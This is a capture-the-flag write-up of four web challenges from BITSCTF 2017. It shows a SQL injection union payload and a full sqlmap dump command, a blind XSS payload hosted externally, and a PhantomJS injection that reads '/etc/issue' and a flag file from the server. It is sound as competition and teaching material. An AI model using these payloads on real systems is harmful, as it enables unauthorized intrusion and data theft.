Hey there,

tl;dr : These are few of the write-ups of the challenges of BITSCTF 2017. The team from which i was participating, “DCUA” Finished at 1st place .

WEB 10:

Here, we were given an website http://botbot.bitsctf.bits-quark.org/ . After going to infamous http://botbot.bitsctf.bits-quark.org/robots.txt we see that there is a directory ‘/fl4g’ . When we go that directory

http://botbot.bitsctf.bits-quark.org/fl4g/

We see the flag BITCTF{take_a_look_at_googles_robots_txt}

WEB 30:

SQL Injection ! Enter ‘; in the text-box presents us with error “You have an error in your SQL Syntax …”

After that i did a Manual SQL Injection finding 2 vulnerable column, so the payload looks like

‘union select 1,@@version#

Now, it’s a piece of cake, To extract automate we can use SQLMap ( This Automation credit goes toPedro Núñez )

$ sqlmap -u "http://joking.bitsctf.bits-quark.org/index.php" --data "id=1&submit1=submit" -p id --dbms=mysql -v 6 --level=3 --risk=3 --threads 5 --dump

BITSCTF{wh4t_d03snt k1ll y0u, s1mply m4k3s y0u str4ng3r!}

WEB 60:

http://msgtheadmin.bitsctf.bits-quark.org/ was the link given for the challenge. After going to the link, we see a field area when something is written in that and submitted it goes to the Admin. We see the possible fault here, what if the Admin Panel’s backend output is unsanitised ?

Blind Cross Site Scripting. In most of my blind XSS Testing, i prefer to use XSS hunter. After submitting the payload in format https://mybox/var.js , After a minute i got a mail about XSS Payload fired [!] .(As expected)

After checking the DOM, I checked the HTML Page content, and here it is. The Flag was in plain text . Sweet! 🙂

BITSCTF{hsr_1s_n0t_cr3ative}

WEB 80:

The admin is interested in showcasing the best websites around the world. But he needs your help in finding those website. So he has asked you for help.

Submit your URLs at http://showtheadmin.bitsctf.bits-quark.org/

Going to the http://showtheadmin.bitsctf.bits-quark.org/ shows the similar interface like the above challenge. But this time it accepts URL only http://site.com/ . I gave my VPS IP in first attempt, I saw an hit by a bot from User-Agent : ‘PhantomJS’ .

We have two possibilities here :

1.) To solve the challenge by DNS Rebinding and changing the document.domain of the Landing page to 127.0.0.1 & fetch the flag

2.) To exploit PhantomJS Configuration itself

Let’s start with first one, we setup the same ( except document.domain trick) and tried to access local directories and files. We were told in the Challenge that flag is present in /secret/flag.php directory. Our first attempt was futile as directories attempt gave us  Forbidden and files request gave us ‘Attempt from Invalid domain’. We didn’t tried changing document.domain & Referrer yet as we kept that in mind for future attempts.

Moving to the next possibility, our thought was to exploit the PhantomJS Configuration itself. We sent a our VPS with http://myvps.com/’okok , whose entry was made in the Access-Logs. After, we did

http://vps.com/";page.customHeaders={Host:'127.0.0.1'};var nonce="

–> Gives request on /

http://vps.com/"+require('fs').read('/etc/issue');page.customHeaders={Host:'127.0.0.1'};var nonce="

And finally dumped the “/var/www/html/cors/secret/flag.php”

BITSCTF{1_st0l3_y0ur_cak3_hu3hu3}

Special Thanks & credits goes to our team member Vladislav Babkin for performing the end attack-vector ! 🙂  We read the content of `flag.php` and saw Access-Control-Allow-Origin: * & checking whether referrer contains bitsctf. I am looking forward to see other Team’s POC for the same challenge too !

Overall it was fun, and shoutouts to the brilliant team members who displayed their exemplary skills to solve every challenges for this CTF and for their support.